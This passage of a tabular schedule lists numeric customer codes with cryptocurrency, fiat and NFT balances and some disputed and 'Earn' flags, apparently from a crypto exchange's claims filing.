| 07342643 | | USD[10.00] | | |
| 07342644 | | BCH[.0021771], BTC[.00012125], CUSDT[7], DOGE[10.52911986], ETH[.00155201], ETHW[.00155201], MKR[.00032018], SOL[.00301263], TRX[1], USD[7.46], YFI[.0000517] | | |
| 07342645 | | USD[10.00] | | |
| 07342646 | | DOGE[49.4355205], SOL[.02768289], USD[0.00], USDT[0] | | |
| 07342647 | | USD[10.00] | | |
| 07342648 | | USD[10.00] | | |
| 07342649 | | USD[10.00] | | |
| 07342650 | | USD[0.00] | | |
| 07342651 | | BRZ[0.00000001], BTC[0], DOGE[3.60372345], ETH[0], LINK[0], LTC[0], SOL[0], SUSHI[0], USD[0.00] | | |
| 07342652 | | BTC[.0001718], SOL[.00002012], USD[0.00] | Yes | |
| 07342653 | | CUSDT[1], DOGE[1025.34374642], TRX[459.97352183], USD[0.00] | | |
| 07342654 | | USD[10.00] | | |
| 07342655 | | USD[10.92] | Yes | |
| 07342656 | | USD[0.79], USDT[0] | Yes | |
| 07342657 | | USD[10.00] | | |
| 07342658 | | USD[10.00] | | |
| 07342659 | | TRX[206.38586768], USD[0.00] | | |
| 07342660 | | DOGE[6992.76848558], TRX[1], USD[0.00] | | |
| 07342661 | | USD[10.00] | | |
| 07342662 | | USD[10.00] | | |
| 07342663 | | USD[10.00] | | |
| 07342664 | | CUSDT[2], TRX[1], USD[5.53], USDT[5.49802776] | Yes | |
| 07342665 | | DOGE[30.22176274], USD[0.00] | Yes | |
| 07342666 | | BAT[5.53352815], BF_POINT[500], CUSDT[1], DOGE[9.58878449], GRT[7.50748621], LINK[2.21377501], SOL[1.10688752], SUSHI[5.53443754], TRX[6], UNI[2.21377501], USD[0.00], USDT[6.64132501] | Yes | |
| 07342667 | | USD[11.09] | Yes | |
| 07342668 | | BRZ[1], CUSDT[7], DOGE[672.70278106], SHIB[1259.6744186], TRX[5.09416724], USD[0.00], USDT[1] | | |
| 07342669 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00], USDT[1] | | |
| 07342670 | | BTC[0], DOGE[1], USD[0.01], USDT[0] | | |
| 07342671 | | BRZ[1], CUSDT[1], DOGE[4243.8476665], USD[0.00] | | |
| 07342672 | | BRZ[2], BTC[0], CUSDT[1], DOGE[70.89321121], ETH[0], TRX[3], USD[0.00] | | |
| 07342673 | | USD[10.00] | | |
| 07342674 | | TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342675 | | USD[10.00] | | |
| 07342676 | | USD[0.00] | | |
| 07342678 | | CUSDT[1], DOGE[130.40312615], USD[0.00] | | |
| 07342679 | | BRZ[1], DOGE[1.97088866], SUSHI[2.03089062], USD[10.00] | | |
| 07342680 | | BTC[.0003779], SOL[5.58], USD[0.00] | | |
| 07342681 | | USD[10.00] | | |
| 07342682 | | USD[10.95] | Yes | |
| 07342683 | | CUSDT[2], DOGE[0], USD[0.00] | | |
| 07342684 | | BRZ[0.00001301], DOGE[0], ETH[0], ETHW[0], USD[0.00] | | |
| 07342685 | | CUSDT[1], TRX[2], USD[0.01] | | |
| 07342686 | | BRZ[1], CUSDT[2], DOGE[3], ETH[0], ETHW[0], SUSHI[0], TRX[0], USD[0.00], USDT[1.09007453] | Yes | |
| 07342687 | | USD[10.00] | | |
| 07342688 | | DOGE[1], USD[0.00] | | |
| 07342689 | Contingent, Disputed | BTC[0], ETH[0], ETHW[0], LTC[0], USD[30.36], USDT[0] | | |
| 07342690 | | USD[10.00] | | |
| 07342691 | | BRZ[1], BTC[0.02674522], CUSDT[1], TRX[1], USD[0.00], USDT[2] | | |
| 07342692 | | USD[10.00] | | |
| 07342694 | | USD[10.00] | | |
| 07342695 | | BAT[21.86301913], USD[0.00] | | |
| 07342696 | | CUSDT[1], DOGE[59.06470864], USD[0.00] | | |
| 07342697 | | USD[10.00] | | |
| 07342698 | | USD[10.00] | | |
| 07342699 | | USD[10.00] | | |
| 07342700 | | USD[10.00] | | |
| 07342701 | | CUSDT[1], DOGE[65.34306395], USD[0.00] | | |
| 07342702 | | USD[10.00] | | |
| 07342703 | | USD[0.00] | | |
| 07342704 | | USD[10.00] | | |
| 07342706 | | TRX[162.86700654], USD[0.00] | | |
| 07342707 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07342708 | | USD[10.00] | | |
| 07342710 | | DOGE[177.35317064], USD[0.00] | | |
| 07342712 | | DOGE[1.9204284], USD[0.00] | | |
| 07342713 | | CUSDT[10], USD[0.01] | | |
| 07342714 | | USD[0.01] | | |
| 07342715 | | USD[10.00] | | |
| 07342716 | | DOGE[110.91287283], SOL[.32426554], USD[0.00] | | |
| 07342717 | | BCH[.05743277], BRZ[1], BTC[.00022393], CUSDT[20], ETH[.04407151], ETHW[.04352431], LTC[.06006988], SHIB[551660.96709565], SOL[.42335588], TRX[139.1918363], USD[0.00] | Yes | |
| 07342718 | | DOGE[332.4080202], USD[0.00] | | |
| 07342719 | | BAT[4.46495561], BRZ[27.38881101], CUSDT[236.78732926], SHIB[750976.26914989], SOL[4.25041003], SUSHI[1.57037367], USD[0.00] | | |
| 07342720 | | BRZ[1], CUSDT[1], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07342721 | | DOGE[143.14289697], USD[0.00] | | |
| 07342722 | | BCH[.00003752], CUSDT[2], DOGE[.00017212], GRT[.09977119], SOL[.00000881], TRX[2], USD[0.01] | | |
| 07342723 | | USD[10.00] | | |
| 07342724 | | DOGE[462.84683311], USD[10.00] | | |
| 07342725 | | BTC[.00014457], USD[10.00] | | |
| 07342726 | | DOGE[140.79087585], USD[0.00] | | |
| 07342727 | | BRZ[1], BTC[.00089041], CUSDT[4], DOGE[4591.86200794], ETH[.00575191], ETHW[.00575191], USD[0.00] | | |
| 07342728 | | BRZ[1], CUSDT[14], DOGE[299.25936865], GRT[239.24514777], LINK[3.87710137], TRX[1], USD[0.00], USDT[1] | | |
| 07342729 | | BRZ[0.00193375], BTC[0], CUSDT[3], DOGE[2508.33261113], TRX[159.14621998], USD[0.00] | | |
| 07342730 | | DOGE[122.39353781], USD[0.00] | | |
| 07342731 | | BRZ[1], DOGE[5869.75974313], TRX[1], USD[0.00] | | |
| 07342732 | | USD[10.00] | | |
| 07342733 | | BAT[1], BRZ[1], DOGE[.00026463], TRX[.000002], USD[0.00] | | |
| 07342734 | | CUSDT[4], TRX[1], USD[0.00] | Yes | |
| 07342735 | | BTC[.00043475], CUSDT[7], DOGE[10631.83038489], GRT[43.69962836], LINK[1.73483095], MATIC[20.56913775], SOL[.21853903], SUSHI[1.96448842], TRX[344.96528546], USD[0.00] | | |
| 07342736 | | USD[0.00] | | |
| 07342737 | | USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342738 | | USD[10.00] | | |
| 07342739 | | USD[10.00] | | |
| 07342740 | | USD[10.00] | | |
| 07342741 | | BTC[0], SHIB[208.78574040], TRX[0], USD[0.00] | | |
| 07342742 | | CUSDT[.96387274], DOGE[1], TRX[1], USD[0.00] | | |
| 07342743 | | USD[10.00] | | |
| 07342744 | | BTC[.00002894], CUSDT[1.4229137], DOGE[1.65164474], GRT[1.00498957], KSHIB[0.31815478], SHIB[327535.29892189], TRX[87.32491248], USD[0.06], USDT[0] | Yes | |
| 07342745 | | BTC[.00022797], CUSDT[2], DOGE[152.07649545], USD[63.98] | | |
| 07342746 | Contingent, Disputed | BAT[2], BRZ[5], CUSDT[7], DOGE[3], ETH[0], ETHW[20.51100481], GRT[1], LINK[.00211476], SHIB[1], SUSHI[.90353537], TRX[4], USD[3869.95], USDT[1.02728026] | Yes | |
| 07342747 | | USD[10.00] | | |
| 07342748 | | BRZ[0], GRT[0.00033388], TRX[0], USD[0.00] | | |
| 07342749 | | CUSDT[5], TRX[9.75314132], USD[0.00] | | |
| 07342750 | | BRZ[3.00000002], DOGE[24.61536821], NEAR[.00071727], SHIB[170903.43095684], SOL[.24601654], TRX[7], USD[0.00], USDT[0] | Yes | |
| 07342751 | | BRZ[1], CUSDT[1], USD[0.00] | Yes | |
| 07342752 | | USD[10.00] | | |
| 07342753 | | BAT[1.0165555], BRZ[2], BTC[.00021263], CUSDT[2], DOGE[2627.56234844], SHIB[936541.95224323], TRX[2], USD[0.64] | Yes | |
| 07342754 | | BTC[.00290853], DOGE[2], ETH[.39854789], ETHW[.39854789], TRX[1], USD[0.00] | | |
| 07342755 | | USD[10.00] | | |
| 07342756 | | BF_POINT[100], BTC[0], ETH[0], ETHW[0.00000147], SOL[0], USD[190.58], USDT[0.00000001] | Yes | |
| 07342757 | | DOGE[1825.363795], TRX[1], USD[60.00] | | |
| 07342758 | | USD[0.00] | | |
| 07342759 | | USD[110.00] | | |
| 07342760 | | BRZ[1], CUSDT[3], DOGE[22990.76900142], TRX[1], USD[0.00], USDT[1] | | |
| 07342761 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07342762 | | CUSDT[2], DOGE[.0974877], USD[0.01] | Yes | |
| 07342763 | | USD[10.00] | | |
| 07342764 | | BRZ[1], BTC[.00000461], CUSDT[11], TRX[1], USD[0.00] | Yes | |
| 07342765 | | BAT[1.01246123], BRZ[1], CUSDT[3], DOGE[74022.22343871], ETH[.55471755], ETHW[.55448459], GRT[1.0023349], LINK[23.03825182], SOL[74.09318875], TRX[1.07174841], USD[0.00] | Yes | |
| 07342766 | | USD[10.00] | | |
| 07342767 | | USD[0.01] | Yes | |
| 07342768 | | USD[10.00] | | |
| 07342769 | | USD[0.00] | | |
| 07342770 | | BTC[.00005595], USD[0.00] | | |
| 07342771 | | USD[0.00] | | |
| 07342772 | | ETH[0], USD[0.00] | | |
| 07342773 | | USD[10.00] | | |
| 07342774 | | BAT[.69468351], BCH[.00353769], BRZ[2], BTC[.00001953], CUSDT[38], DOGE[2.77455022], ETH[.01051762], ETHW[.01051762], GRT[.74997072], LINK[.06602318], LTC[.00807455], TRX[7.11886911], USD[0.00], USDT[1], YFI[.00001342] | | |
| 07342775 | | USD[0.00] | | |
| 07342776 | | CUSDT[1], DOGE[428.86249741], USD[0.00] | | |
| 07342777 | | CUSDT[1], USD[0.01] | Yes | |
| 07342778 | | USD[10.00] | | |
| 07342780 | | BTC[0], TRX[1], USD[0.00] | | |
| 07342781 | | ETH[.00000065], ETHW[.00000065], USD[0.00] | | |
| 07342782 | | USD[10.00] | | |
| 07342783 | | USD[10.00] | | |
| 07342784 | | SUSHI[1.2046668], USD[0.00] | Yes | |
| 07342785 | | USD[10.00] | | |
| 07342786 | | USD[10.00] | | |
| 07342787 | | BTC[0], CUSDT[3], DOGE[3], ETH[0], ETHW[0], MATIC[.00097213], SHIB[41.60402719], SUSHI[11.55037722], TRX[4], USD[0.01] | Yes | |
| 07342788 | | USD[0.00] | | |
| 07342789 | | USD[10.00] | | |
| 07342790 | | USD[10.00] | | |
| 07342791 | | BRZ[2], BTC[.00126175], CUSDT[2], DOGE[1028.82060641], LINK[3.64219071], SUSHI[.00006387], TRX[327.90312605], USD[6.90] | Yes | |
| 07342792 | | USD[10.00] | | |
| 07342794 | | AVAX[0], BTC[0], DOGE[4.05085090], ETH[0], LINK[0], SHIB[12], SOL[12.87623497], TRX[2], USD[0], USDT[0.00000002] | Yes | |
| 07342795 | | BAT[7.48558988], CUSDT[6], NFT [477063874159834776/Dream Land #5][1], SOL[.30591434], TRX[1], USD[0.00] | Yes | |
| 07342796 | | BTC[0], CUSDT[7], DOGE[2.00000058], ETH[0], LINK[0], SHIB[1], USD[124.07], USDT[0] | | |
| 07342797 | | SOL[.98646053], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342798 | | USD[10.00] | | |
| 07342799 | | ETH[0], USD[0.00] | | |
| 07342800 | | BTC[0], CUSDT[1], DOGE[0], ETH[0], SHIB[122500.9321312], USD[0.00], USDT[0.00000015] | Yes | |
| 07342801 | | USD[10.00] | | |
| 07342802 | | USD[11.05] | Yes | |
| 07342803 | | USD[10.00] | | |
| 07342804 | | ETH[.00562839], ETHW[.00562839], USD[0.00] | | |
| 07342805 | | DOGE[723.13258271], USD[0.00] | | |
| 07342806 | | USD[0.00] | | |
| 07342807 | | DOGE[1], USD[0.01] | | |
| 07342809 | | USD[10.00] | | |
| 07342810 | | DOGE[18.08791264], USD[0.00] | | |
| 07342811 | | USD[10.00] | | |
| 07342812 | | USD[10.00] | | |
| 07342813 | | USD[0.00] | | |
| 07342814 | | CUSDT[2], DOGE[689.55891929], SHIB[4694835.68075117], TRX[1], USD[0.00] | | |
| 07342815 | | USD[0.00], USDT[0.00000001] | | |
| 07342816 | | BTC[.00172307], CUSDT[3], DOGE[1589.16356916], ETH[.01418758], ETHW[.01418758], USD[0.00] | | |
| 07342817 | | BTC[.00000037], DOGE[.94766715], USD[0.00] | | |
| 07342818 | | USD[0.01] | Yes | |
| 07342819 | | USD[10.00] | | |
| 07342820 | | CUSDT[2], USD[0.00] | Yes | |
| 07342821 | | USD[25.00] | | |
| 07342822 | | USD[10.00] | | |
| 07342823 | | ETH[.00635584], ETHW[.00635584], USD[0.00] | | |
| 07342824 | | BAT[1], BRZ[4], CUSDT[5], TRX[7], USD[0.00], USDT[1] | | |
| 07342825 | | USD[0.00], USDT[0] | Yes | |
| 07342826 | | USD[0.00] | | |
| 07342828 | | BRZ[127.21434283], BTC[.01136603], CUSDT[830.42848516], DOGE[1481.04788229], ETH[.19378736], ETHW[.19357496], LINK[2.61196745], MATIC[29.9341233], SHIB[1226011.13387288], SOL[1.009009571], TRX[1221.9846345], USD[13.09] | Yes | |
| 07342830 | | USD[10.00] | | |
| 07342832 | | USD[10.00] | | |
| 07342833 | | BRZ[1], CUSDT[6], DOGE[1], USD[0.01] | Yes | |
| 07342834 | | USD[10.00] | | |
| 07342835 | | BAT[2.07527335], BRZ[1], BTC[0], CUSDT[1], ETH[1.06318007], ETHW[1.06273341], SOL[150.84232738], TRX[1], USD[0.00] | Yes | |
| 07342836 | | BTC[0], DOGE[0], TRX[2426.86151717], USD[0.00] | | |
| 07342837 | | USD[10.00] | | |
| 07342839 | | USD[10.00] | | |
| 07342840 | | USD[10.00] | | |
| 07342841 | | USD[10.00] | | |
| 07342842 | | BRZ[1], CUSDT[3], USD[0.00] | | |
| 07342843 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07342844 | | USD[10.00] | | |
| 07342845 | | USD[10.00] | | |
| 07342846 | | DOGE[0], NFT (473240403856983868/Entrance Voucher #4127)[1], USD[0.01], USDT[0] | Yes | |
| 07342847 | | BTC[0], DOGE[0], ETH[0], ETHW[0.03129494], GRT[0], SOL[0], SUSHI[0], USD[208.29] | Yes | |
| 07342848 | | CUSDT[1], DOGE[0], TRX[1], USD[0.00] | | |
| 07342849 | | USD[0.00] | | |
| 07342850 | | BTC[0], DOGE[0], TRX[0], USD[0.01], USDT[0] | Yes | |
| 07342851 | | BRZ[3], BTC[.00221906], CUSDT[51.49647333], DOGE[1], ETH[.00725569], ETHW[.00715993], TRX[6], USD[0.00], USDT[0] | Yes | |
| 07342852 | | USD[0.00] | | |
| 07342853 | | USD[10.00] | | |
| 07342854 | | BRZ[0], DOGE[1], USD[0.01] | | |
| 07342855 | | BTC[0], CUSDT[1], USD[26.22] | | |
| 07342856 | | BRZ[3], CUSDT[1254.1323851], NFT (435368192563807805/Soulless #6773)[1], NFT (567293886700066584/#3935)[1], SHIB[14], SOL[14.53378818], TRX[6], USD[975.50] | Yes | |
| 07342857 | | USD[10.00] | | |
| 07342858 | | USD[10.00] | | |
| 07342859 | | USD[10.00] | | |
| 07342860 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342861 | | BAT[1], BRZ[4], BTC[.00000065], CUSDT[12], DOGE[174579.58545822], ETH[.49791881], ETHW[.49791881], GRT[3], SHIB[1], SOL[.27215308], TRX[44.9858482], UNI[.0114981], USD[18.39], USDT[3] | | |
| 07342862 | | USD[10.00] | | |
| 07342863 | | DOGE[.00007597], USD[9.74] | | |
| 07342864 | | DOGE[4], GRT[60.25779043], TRX[223.13711902], USD[0.00] | | |
| 07342865 | | BTC[0], USD[0.01], USDT[0] | | |
| 07342866 | | BRZ[1], DOGE[1], ETH[.00000001], ETHW[0], GRT[1.00321582], SHIB[1], TRX[2], USD[73.60] | | |
| 07342867 | | BTC[.00000423], USD[0.00] | | |
| 07342868 | | BRZ[25.81867], CUSDT[232.10741931], USD[0.00] | | |
| 07342869 | | SHIB[1], TRX[166.03396719], USD[0.01], USDT[1.02474869] | Yes | |
| 07342870 | | LINK[1.53942796], SHIB[1], USD[0.00] | Yes | |
| 07342871 | | USD[10.00] | | |
| 07342872 | | USD[10.00] | | |
| 07342873 | | DOGE[1], USD[0.00] | Yes | |
| 07342874 | | BRZ[1], CUSDT[2], DOGE[2], USD[0.00] | Yes | |
| 07342875 | | CUSDT[1], DOGE[177.04508896], USD[0.00] | | |
| 07342876 | | CUSDT[1], GBP[0.00], USD[0.00] | | |
| 07342877 | | BRZ[4], CUSDT[37], DOGE[1793.31829636], ETH[.00019279], ETHW[.00019279], TRX[9.01102039], USD[108.75] | Yes | |
| 07342878 | | CUSDT[1], DOGE[122.10468425], USD[0.00] | | |
| 07342879 | | BRZ[415.4883817], CUSDT[1321.28089099], DOGE[3553.42573488], ETH[.03439003], ETHW[.03396595], TRX[1759.49119085], USD[3.00] | Yes | |
| 07342880 | | BRZ[1], CUSDT[1], DOGE[2], ETH[0.00000392], ETHW[0.00000392], TRX[1], USD[0.00], USDT[1.08604042] | Yes | |
| 07342881 | | USD[10.00] | | |
| 07342882 | | DOGE[0.00000006], SHIB[0.03805545], USD[0.01] | Yes | |
| 07342883 | | BAT[1.01462176], BRZ[2], CUSDT[582.60583813], DOGE[73501.00713891], GRT[2.03360676], SOL[1.9930786], SUSHI[1.08273687], TRX[4], USD[210.36], USDT[0] | Yes | |
| 07342884 | | BRZ[0], CUSDT[14], TRX[2], USD[0.50] | Yes | |
| 07342885 | | BRZ[3], CUSDT[8], DOGE[1], ETHW[1.11769859], GRT[1.00426877], SHIB[3], TRX[7], USD[0.00], USDT[0] | | |
| 07342886 | | USD[10.00] | | |
| 07342887 | | ETH[.00000001], TRX[1], USD[4.27] | Yes | |
| 07342888 | | DOGE[1], TRX[2], USD[0.00] | | |
| 07342889 | | CUSDT[2], DOGE[283.85930793], TRX[1], USD[0.01], USDT[1] | | |
| 07342890 | | BTC[.00008823], DOGE[100.56632096], USD[0.00] | Yes | |
| 07342892 | | USD[0.00] | | |
| 07342893 | | USD[10.00] | | |
| 07342894 | | USD[10.00] | | |
| 07342895 | | CUSDT[2], DOGE[.00004944], USD[0.00] | | |
| 07342897 | | DOGE[1290.88946952], TRX[1], USD[3.12] | | |
| 07342898 | | BRZ[1], CUSDT[2], DOGE[.90294281], ETH[.00173985], ETHW[.00173985], LINK[0.00698647], TRX[.75], UNI[.04995432], USD[0.00], USDT[24.73859733] | | |
| 07342899 | | BRZ[1], DOGE[326.38409243], USD[0.00] | | |
| 07342900 | | BAT[2], BRZ[6], CUSDT[8], DOGE[1], GRT[3], TRX[9], USD[0.00], USDT[4] | | |
| 07342901 | | BRZ[1], BTC[.01305929], CUSDT[12], DOGE[522.04072241], ETH[.02980653], ETHW[.02980653], TRX[202.77880119], USD[0.96] | | |
| 07342902 | | USD[10.00] | | |
| 07342903 | | USD[10.00] | | |
| 07342904 | | USD[10.00] | | |
| 07342905 | | BTC[.00044269], DOGE[1156.10586185], LINK[.35347483], TRX[63.06623944], USD[0.00] | Yes | |
| 07342906 | | USD[10.00] | | |
| 07342907 | | DOGE[30002.56085993], ETH[.12212015], ETHW[.12212015], SHIB[377187.68874471], SOL[.13214608], USD[0.00], USDT[0] | | |
| 07342908 | | USD[10.00] | | |
| 07342909 | | CUSDT[0], ETH[0], LINK[0], SOL[0], TRX[0], USD[0.01], USDT[0] | | |
| 07342910 | | USD[10.00] | | |
| 07342911 | | USD[10.00] | | |
| 07342912 | | BTC[.00000008], USD[0.00], USDT[0] | | |
| 07342913 | | BCH[.00091532], BRZ[1], DOGE[18.02277704], USD[5.73] | | |
| 07342914 | | SHIB[180.68031539], USD[228.75] | Yes | |
| 07342915 | | CUSDT[3], DOGE[410.27263788], USD[0.49] | | |
| 07342916 | | SUSHI[.70020367], USD[0.00] | | |
| 07342917 | | DOGE[1.89846631], USD[0.02] | | |
| 07342918 | | BRZ[1], CUSDT[2], TRX[3], USD[0.01] | | |
| 07342919 | | BRZ[1], CUSDT[9], DOGE[2], ETH[.04986384], ETHW[.04986384], TRX[1], USD[0.00], USDT[1] | | |
| 07342921 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342922 | | USD[0.00] | Yes | |
| 07342923 | | USD[10.00] | | |
| 07342924 | | BF_POINT[700], BTC[0], DOGE[137.18329224], ETH[0.00000001], GRT[0], LINK[.00000001], MATIC[0], NFT (34021909412725 9534/CowGirl)[1], NFT (57360392059914 0004/Golden Cheetah)[1], SHIB[3766542.55307708], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07342925 | | USD[10.00] | | |
| 07342926 | | BRZ[1], DOGE[6543.77080583], USD[0.00] | | |
| 07342927 | | DOGE[1], USD[0.00] | | |
| 07342928 | | USD[10.00] | | |
| 07342929 | | USD[10.00] | | |
| 07342932 | | USD[0.00] | | |
| 07342933 | | BAT[1], BRZ[1], CUSDT[9], ETH[.00003109], ETHW[.00003109], TRX[4], USD[0.01] | Yes | |
| 07342934 | | BTC[.00020816], USD[0.00] | | |
| 07342936 | | USD[10.00] | | |
| 07342939 | | BTC[0], DOGE[1], SUSHI[0], USD[0.00] | | |
| 07342940 | | USD[10.00] | | |
| 07342941 | | DOGE[0.00367334], USD[0.00] | Yes | |
| 07342942 | | USD[10.00] | | |
| 07342943 | | BF_POINT[500], CUSDT[2], USD[11.98] | Yes | |
| 07342944 | | CUSDT[3], TRX[4], USD[0.00] | | |
| 07342945 | | DOGE[1], USD[0.00] | Yes | |
| 07342946 | | USD[10.00] | | |
| 07342948 | | DOGE[1], TRX[178.53776145], USD[0.00] | | |
| 07342949 | | USD[10.00] | | |
| 07342950 | | DOGE[.07484602], USD[0.00] | | |
| 07342951 | | DOGE[1], USD[0.00] | | |
| 07342952 | | USD[10.00] | | |
| 07342955 | | DOGE[821.68334449], TRX[1], USD[0.24] | | |
| 07342956 | | USD[10.00] | | |
| 07342958 | | TRX[1.0672328], USD[0.00] | | |
| 07342959 | | DOGE[13506.14857603], TRX[2], USD[0.00] | | |
| 07342960 | | USD[10.00] | | |
| 07342961 | | USD[10.00] | | |
| 07342962 | | USD[10.96] | Yes | |
| 07342963 | | USD[10.00] | | |
| 07342964 | | BAT[1], TRX[1], USD[0.01] | | |
| 07342965 | | USD[10.00] | | |
| 07342966 | | USD[10.00] | | |
| 07342968 | | USD[10.00] | | |
| 07342969 | | USD[0.00] | | |
| 07342971 | | USD[10.00] | | |
| 07342972 | | USD[10.00] | | |
| 07342973 | | USD[10.00] | | |
| 07342974 | | USD[10.00] | | |
| 07342975 | | USD[10.00] | | |
| 07342976 | | BTC[.0002847], CUSDT[1], DOGE[1353.20991446], LTC[.08714499], TRX[2], USD[55.00] | | |
| 07342977 | | BRZ[1], CUSDT[3], DOGE[163.5460173], TRX[1], USD[0.01] | | |
| 07342978 | | BTC[.00207107], CUSDT[5], DOGE[22.87268199], ETH[.05313503], ETHW[.05313503], LINK[.60782741], LTC[.53571657], TRX[1278.07496618], USD[0.39] | | |
| 07342979 | | USD[10.00] | | |
| 07342980 | | USD[10.00] | | |
| 07342981 | | TRX[1], USD[0.00] | | |
| 07342982 | | USD[10.00] | | |
| 07342983 | | NFT (318410606039589635/Romeo #1263)[1], USD[11.02] | Yes | |
| 07342984 | | BTC[0], DOGE[ 12], SOL[.0041689], USD[0.07], USDT[0] | | |
| 07342985 | | CUSDT[1211.78172677], DOGE[.19989232], TRX[165.57733339], USD[0.00] | | |
| 07342986 | | USD[10.00] | | |
| 07342987 | | USD[10.00] | | |
| 07342988 | | USD[10.00] | | |
| 07342989 | | USD[10.00] | | |
| 07342990 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07342991 | | CUSDT[140.53424561], DOGE[8.86587025], TRX[13.64504529], USD[0.00] | | |
| 07342992 | | USD[10.00] | | |
| 07342994 | | USD[0.00] | | |
| 07342995 | | USD[10.00] | | |
| 07342996 | | USD[10.00] | | |
| 07342997 | | BRZ[1], CUSDT[3], DOGE[0], ETH[0], TRX[1], USD[0.00], USDT[1] | | |
| 07342998 | | DOGE[27.56445907], USD[0.00] | | |
| 07343000 | | BAT[70.36963211], BTC[.0014153], CUSDT[6], DOGE[1108.85918875], ETH[.01716779], ETHW[.01716779], SHIB[1162013.53380097], TRX[294.90843242], USD[2.97] | | |
| 07343001 | | USD[10.00] | | |
| 07343002 | | DOGE[875.23211065], TRX[2], USD[0.00] | | |
| 07343003 | | USD[10.00] | | |
| 07343004 | | USD[10.00] | | |
| 07343005 | | BTC[.00021483], ETH[.00000018], ETHW[.00000018], USD[0.00] | | |
| 07343006 | | USD[0.00], USDT[10.23663103] | Yes | |
| 07343007 | | CUSDT[1], USD[0.02] | | |
| 07343008 | | USD[10.00] | | |
| 07343009 | | BTC[.00071631], DOGE[1794.97168108], TRX[440.02859363], USD[0.00] | | |
| 07343010 | | DOGE[133.72967875], USD[0.00] | | |
| 07343011 | | USD[10.00] | | |
| 07343012 | | BRZ[1], DOGE[6398.45003946], USD[10.00] | | |
| 07343013 | | BTC[.02387966], CUSDT[9], DOGE[2], SHIB[5], TRX[2], USD[0.00] | Yes | |
| 07343014 | | BAT[2.62997595], BCH[0], BRZ[2], BTC[.00001189], CUSDT[.00046717], DOGE[31715.86392922], GRT[1.05336615], KSHIB[19002.98815], LINK[2.17008634], LTC[2.3510898], SHIB[13403274.56609753], SOL[19.929766], SUSHI[1.7595777], TRX[3733.48485813], UNI[2.17008634], USD[0.80], USDT[0], YFI[.04251648] | Yes | |
| 07343015 | | USD[10.00] | | |
| 07343016 | | DOGE[0.73084253], ETH[0.00015208], ETHW[0.00020906], NFT [429462311163278383/Entrance Voucher #4687],[1], TRX[0], USD[1449.49] | | |
| 07343017 | | USD[10.00] | | |
| 07343018 | | USD[10.00] | | |
| 07343019 | | USD[10.00] | | |
| 07343020 | | CUSDT[2], ETH[.00539747], ETHW[.00539747], TRX[1], USD[0.00], USDT[0] | | |
| 07343021 | | MATIC[16.44799506], SHIB[1], USD[0.00] | | |
| 07343022 | | USD[0.00] | | |
| 07343023 | | USD[10.00] | | |
| 07343024 | | USD[10.00] | | |
| 07343026 | | BTC[0], DOGE[.655], ETH[0], GRT[0], USD[0.06], USDT[3.85819482] | | |
| 07343027 | | USD[10.00] | | |
| 07343028 | | USD[10.00] | | |
| 07343029 | | USD[10.00] | | |
| 07343030 | | USD[10.00] | | |
| 07343031 | | DOGE[1], NFT [479705693923882898/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #68],[1], SHIB[2], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07343032 | | BTC[.00314094], DOGE[7710.46735393], USD[0.00] | Yes | |
| 07343033 | | CUSDT[1], DOGE[31.16464393], USD[0.00] | | |
| 07343034 | | TRX[24.9], USD[0.02] | | |
| 07343035 | | USD[10.00] | | |
| 07343036 | | USD[10.00] | | |
| 07343037 | | USD[10.00] | | |
| 07343038 | | USD[10.00] | | |
| 07343039 | | CUSDT[1], DOGE[2113.76290893], USD[0.00] | | |
| 07343040 | | BTC[0.00029070], CUSDT[6], DOGE[2], ETH[0], SHIB[0], SOL[0], SUSHI[0], TRX[5], USD[0.00] | Yes | |
| 07343041 | | USD[10.00] | | |
| 07343042 | | DOGE[.00026878], USD[0.30] | | |
| 07343043 | | USD[10.00] | | |
| 07343044 | | BAT[1], BRZ[1], DOGE[3.40866282], ETH[.11591717], ETHW[.11591717], LINK[6.8272964], LTC[3.61176946], TRX[1], USD[0.09] | | |
| 07343045 | | BAT[1], BRZ[1], CUSDT[1], ETH[0], GRT[1], TRX[1], USD[0.01] | | |
| 07343046 | | USD[10.00] | | |
| 07343047 | | USD[10.00] | | |
| 07343049 | | BRZ[2], CUSDT[1], TRX[2], USD[0.01] | | |
| 07343050 | | CUSDT[1], DAI[0], DOGE[1], USD[0.00] | | |
| 07343051 | | DOGE[.74], USD[0.00] | | |
| 07343052 | | CUSDT[4], TRX[2], USD[396.16] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07343053 | | USD[0.00], USDT[0.00005206] | | |
| 07343054 | | USD[10.00] | | |
| 07343055 | | USD[10.00] | | |
| 07343056 | | BTC[.00036187], USD[0.00] | | |
| 07343057 | | USD[0.00] | Yes | |
| 07343058 | | USD[10.00] | | |
| 07343059 | | USD[10.00] | | |
